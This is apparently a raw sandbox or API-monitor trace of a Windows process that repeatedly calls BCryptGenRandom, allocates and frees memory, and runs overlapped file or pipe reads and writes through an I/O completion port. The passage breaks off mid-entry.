[0197.852] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.853] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.853] free (_Block=0x3e305b8) [0197.853] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.853] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.853] free (_Block=0x1fa91d0) [0197.853] free (_Block=0x1fa2ed8) [0197.853] free (_Block=0x1fa90b8) [0197.853] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.854] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.854] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.868] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15ea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.869] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.869] CloseHandle (hObject=0x170) returned 1 [0197.869] free (_Block=0x3df0008) [0197.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.879] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.879] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.879] free (_Block=0x3e305b8) [0197.880] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.880] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.880] free (_Block=0x1fa91d0) [0197.880] free (_Block=0x1fa2ed8) [0197.880] free (_Block=0x1fa90b8) [0197.880] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.881] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.892] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x29e5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.905] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.905] free (_Block=0x3e305b8) [0197.906] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.906] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.906] free (_Block=0x1fa91d0) [0197.906] free (_Block=0x1fa2ed8) [0197.906] free (_Block=0x1fa90b8) [0197.906] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.908] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xcd60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.926] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.074] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa7c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.075] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.376] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x239c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.403] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xdafc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.423] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x224e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0199.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.441] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.441] free (_Block=0x3e305b8) [0199.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.441] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.442] free (_Block=0x1fa91d0) [0199.442] free (_Block=0x1fa2ed8) [0199.442] free (_Block=0x1fa90b8) [0199.442] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.458] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.458] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.458] free (_Block=0x3e305b8) [0199.458] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.458] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.458] free (_Block=0x1fa91d0) [0199.458] free (_Block=0x1fa2ed8) [0199.458] free (_Block=0x1fa90b8) [0199.458] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.472] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.472] free (_Block=0x3e305b8) [0199.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.472] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.472] free (_Block=0x1fa91d0) [0199.473] free (_Block=0x1fa2ed8) [0199.473] free (_Block=0x1fa90b8) [0199.473] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0199.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.474] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0199.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.493] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4d84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.517] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.517] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.517] free (_Block=0x3e305b8) [0199.517] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.517] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.518] free (_Block=0x1fa91d0) [0199.518] free (_Block=0x1fa2ed8) [0199.518] free (_Block=0x1fa90b8) [0199.518] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.530] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.530] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.530] free (_Block=0x3e305b8) [0199.530] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.530] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.531] free (_Block=0x1fa91d0) [0199.531] free (_Block=0x1fa2ed8) [0199.531] free (_Block=0x1fa90b8) [0199.531] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.537] CloseHandle (hObject=0x308) returned 1 [0199.538] free (_Block=0x1ff1e60) [0199.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.544] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5168, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0199.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.567] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.567] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.567] free (_Block=0x3e305b8) [0199.567] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.568] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.568] free (_Block=0x1fa91d0) [0199.568] free (_Block=0x1fa2ed8) [0199.568] free (_Block=0x1fa90b8) [0199.568] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0199.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0199.577] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.577] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.577] free (_Block=0x3e305b8) [0199.577] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.577] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.577] free (_Block=0x1fa91d0) [0199.577] free (_Block=0x1fa2ed8) [0199.577] free (_Block=0x1fa90b8) [0199.578] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.598] CloseHandle (hObject=0x308) returned 1 [0199.598] free (_Block=0x3df0008) [0199.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.603] CloseHandle (hObject=0x338) returned 1 [0199.603] free (_Block=0x1ff1e60) [0199.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.605] CloseHandle (hObject=0x3cc) returned 1 [0199.605] free (_Block=0x3d70450) [0199.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.653] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.654] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.671] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x926, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0199.737] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: 